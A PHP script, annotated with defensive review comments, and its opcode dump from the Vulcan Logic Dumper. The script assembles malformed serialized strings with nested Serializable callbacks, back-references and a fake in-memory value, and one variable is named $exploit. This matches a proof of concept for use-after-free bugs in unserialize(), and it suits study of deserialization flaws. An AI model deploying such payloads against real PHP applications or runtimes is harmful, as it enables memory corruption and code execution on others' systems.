<?php
/*
 * Regression-style test case for PHP's unserialize(): it feeds a hand-built,
 * deliberately malformed serialized string through nested
 * Serializable::unserialize() callbacks and dumps the result.
 *
 * Review notes (defender's view):
 *  - Only $l reaches unserialize(). $fakezval, $inner and $exploit are
 *    assembled but never used in this script.
 *  - The risk class is deserialization of attacker-controlled bytes that may
 *    instantiate classes with magic methods (__wakeup, __destruct,
 *    Serializable::unserialize). Application code should not call
 *    unserialize() on untrusted input: prefer json_decode(), or pass
 *    ['allowed_classes' => false] as the second argument, and keep the
 *    runtime patched.
 *  - The Serializable interface used here is deprecated as of PHP 8.1 in
 *    favour of __serialize()/__unserialize().
 */

/**
 * Wrapper whose custom (un)serialization simply delegates to the global
 * serialize()/unserialize() on its single $data property.
 */
class obj implements Serializable {
    // Payload restored by unserialize(); holds whatever the nested call returns.
    var $data;

    /** Returns the serialized form of $this->data. */
    function serialize() {
        return serialize($this->data);
    }

    /**
     * Re-enters the global unserialize() from inside an unserialize callback.
     * This nesting is what the "C:3:"obj"" records in the payload trigger.
     */
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

/** Class with a __wakeup hook that overwrites its own property after restore. */
class obj2 {
    var $ryat;

    /** Runs automatically after unserialize() rebuilds an obj2; sets ryat to 1. */
    function __wakeup() {
        $this->ryat = 1;
    }
}

/** Class with a destructor that clears its property and prints a marker. */
class aod {
    public $aod;

    /**
     * Nulls $this->aod and echoes 'des', so the output shows when (and how
     * often) an aod instance is destroyed.
     */
    public function __destruct() {
        $this->aod=null;
        echo('des');
    }
}

// 24-byte binary string: two 8-byte little-endian integers followed by
// 4 + 1 + 1 + 2 literal bytes. NOTE(review): the name suggests it imitates an
// in-memory value structure; the intended layout is not confirmable from this
// page. 1122334455 is presumably a recognisable placeholder value.
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";

// Unterminated array fragment (no closing brace) with an R: back-reference.
$inner = 'a:1:{i:0;R:3;';

// Second serialized string built from $inner and $fakezval. It is never
// passed to unserialize() below, so it has no effect on this run.
$exploit = 'a:3:{i:0;O:4:"obj2":1:{s:4:"ryat";C:3:"obj":'.strlen($inner).':{'.$inner.'}}';
$exploit.= 'i:1;s:'.strlen($fakezval).':"'.$fakezval.'";';
$exploit.= 'i:2;a:1:{i:13;a:1:{i:15;r:4;}}}';

// $i is intentionally truncated: it announces an aod object with 2 properties
// and a 5-element array, but stops after two array entries without closing
// either brace.
$i='O:3:"aod":2:{s:3:"aod";a:5:{i:0;R:5;i:1;R:3;';
// $j and $k wrap that fragment in two levels of custom-serialized obj records,
// so obj::unserialize() is entered twice before the malformed data is parsed.
$j='C:3:"obj":'.strlen($i).':{'.$i.'}';
$k='C:3:"obj":'.strlen($j).':{'.$j.'}';
// Outer array: element 0 is the nested record, element 1 is an R: back-reference.
// NOTE(review): presumably the back-reference is meant to point at a value
// created by the inner parse that failed. Confirm against the engine's
// unserialize implementation.
$l='a:2:{i:0;'.$k.'i:1;R:5;}';

// The only deserialization actually performed; the dump shows what survived.
$data = unserialize($l);

var_dump($data);

/**
 * Encodes the low 64 bits of an integer as an 8-byte little-endian string.
 *
 * Declared after its first call above; PHP still resolves it because the
 * declaration is unconditional and at file level.
 */
function ptr2str($ptr) {
    $out = '';
    for ($i = 0; $i < 8; $i++) {
        // Emit the least significant byte first, then shift it away.
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  (null)
number of ops:  51
compiled vars:  !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $i, !4 = $j, !5 = $k, !6 = $l, !7 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   DECLARE_CLASS                                            'obj'
   26     1        INIT_FCALL_BY_NAME                                       'ptr2str'
          2        SEND_VAL_EX                                              1122334455
          3        DO_FCALL                                      0  $8      
          4        ASSIGN                                                   !0, $8
   27     5        INIT_FCALL_BY_NAME                                       'ptr2str'
          6        SEND_VAL_EX                                              0
          7        DO_FCALL                                      0  $10     
          8        ASSIGN_OP                                     8          !0, $10
   28     9        ASSIGN_OP                                     8          !0, '%00%00%00%00'
   29    10        ASSIGN_OP                                     8          !0, '%01'
   30    11        ASSIGN_OP                                     8          !0, '%00'
   31    12        ASSIGN_OP                                     8          !0, '%00%00'
   33    13        ASSIGN                                                   !1, 'a%3A1%3A%7Bi%3A0%3BR%3A3%3B'
   34    14        STRLEN                                           ~17     !1
         15        CONCAT                                           ~18     'a%3A3%3A%7Bi%3A0%3BO%3A4%3A%22obj2%22%3A1%3A%7Bs%3A4%3A%22ryat%22%3BC%3A3%3A%22obj%22%3A', ~17
         16        CONCAT                                           ~19     ~18, '%3A%7B'
         17        CONCAT                                           ~20     ~19, !1
         18        CONCAT                                           ~21     ~20, '%7D%7D'
         19        ASSIGN                                                   !2, ~21
   35    20        STRLEN                                           ~23     !0
         21        CONCAT                                           ~24     'i%3A1%3Bs%3A', ~23
         22        CONCAT                                           ~25     ~24, '%3A%22'
         23        CONCAT                                           ~26     ~25, !0
         24        CONCAT                                           ~27     ~26, '%22%3B'
         25        ASSIGN_OP                                     8          !2, ~27
   36    26        ASSIGN_OP                                     8          !2, 'i%3A2%3Ba%3A1%3A%7Bi%3A13%3Ba%3A1%3A%7Bi%3A15%3Br%3A4%3B%7D%7D%7D'
   38    27        ASSIGN                                                   !3, 'O%3A3%3A%22aod%22%3A2%3A%7Bs%3A3%3A%22aod%22%3Ba%3A5%3A%7Bi%3A0%3BR%3A5%3Bi%3A1%3BR%3A3%3B'
   39    28        STRLEN                                           ~31     !3
         29        CONCAT                                           ~32     'C%3A3%3A%22obj%22%3A', ~31
         30        CONCAT                                           ~33     ~32, '%3A%7B'
         31        CONCAT                                           ~34     ~33, !3
         32        CONCAT                                           ~35     ~34, '%7D'
         33        ASSIGN                                                   !4, ~35
   40    34        STRLEN                                           ~37     !4
         35        CONCAT                                           ~38     'C%3A3%3A%22obj%22%3A', ~37
         36        CONCAT                                           ~39     ~38, '%3A%7B'
         37        CONCAT                                           ~40     ~39, !4
         38        CONCAT                                           ~41     ~40, '%7D'
         39        ASSIGN                                                   !5, ~41
   41    40        CONCAT                                           ~43     'a%3A2%3A%7Bi%3A0%3B', !5
         41        CONCAT                                           ~44     ~43, 'i%3A1%3BR%3A5%3B%7D'
         42        ASSIGN                                                   !6, ~44
   42    43        INIT_FCALL                                               'unserialize'
         44        SEND_VAR                                                 !6
         45        DO_ICALL                                         $46     
         46        ASSIGN                                                   !7, $46
   45    47        INIT_FCALL                                               'var_dump'
         48        SEND_VAR                                                 !7
         49        DO_ICALL                                                 
   55    50      > RETURN                                                   1

Function ptr2str:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 11
Branch analysis from position: 11
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 4
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
Branch analysis from position: 4
filename:       /in/AeavT
function name:  ptr2str
number of ops:  15
compiled vars:  !0 = $ptr, !1 = $out, !2 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   47     0  E >   RECV                                             !0      
   49     1        ASSIGN                                                   !1, ''
   50     2        ASSIGN                                                   !2, 0
          3      > JMP                                                      ->11
   51     4    >   INIT_FCALL                                               'chr'
          5        BW_AND                                           ~5      !0, 255
          6        SEND_VAL                                                 ~5
          7        DO_ICALL                                         $6      
          8        ASSIGN_OP                                     8          !1, $6
   52     9        ASSIGN_OP                                     7          !0, 8
   50    10        PRE_INC                                                  !2
         11    >   IS_SMALLER                                               !2, 8
         12      > JMPNZ                                                    ~10, ->4
   54    13    > > RETURN                                                   !1
   55    14*     > RETURN                                                   null

End of function ptr2str

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    7     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  unserialize
number of ops:  7
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   RECV                                             !0      
    9     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   10     6      > RETURN                                                   null

End of function unserialize

End of class obj.

Class obj2:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  __wakeup
number of ops:  3
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   16     0  E >   ASSIGN_OBJ                                               'ryat'
          1        OP_DATA                                                  1
   17     2      > RETURN                                                   null

End of function __wakeup

End of class obj2.

Class aod:
Function __destruct:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  __destruct
number of ops:  4
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   ASSIGN_OBJ                                               'aod'
          1        OP_DATA                                                  null
          2        ECHO                                                     'des'
   23     3      > RETURN                                                   null

End of function __destruct

End of class aod.

Generated using Vulcan Logic Dumper, using php 8.0.0

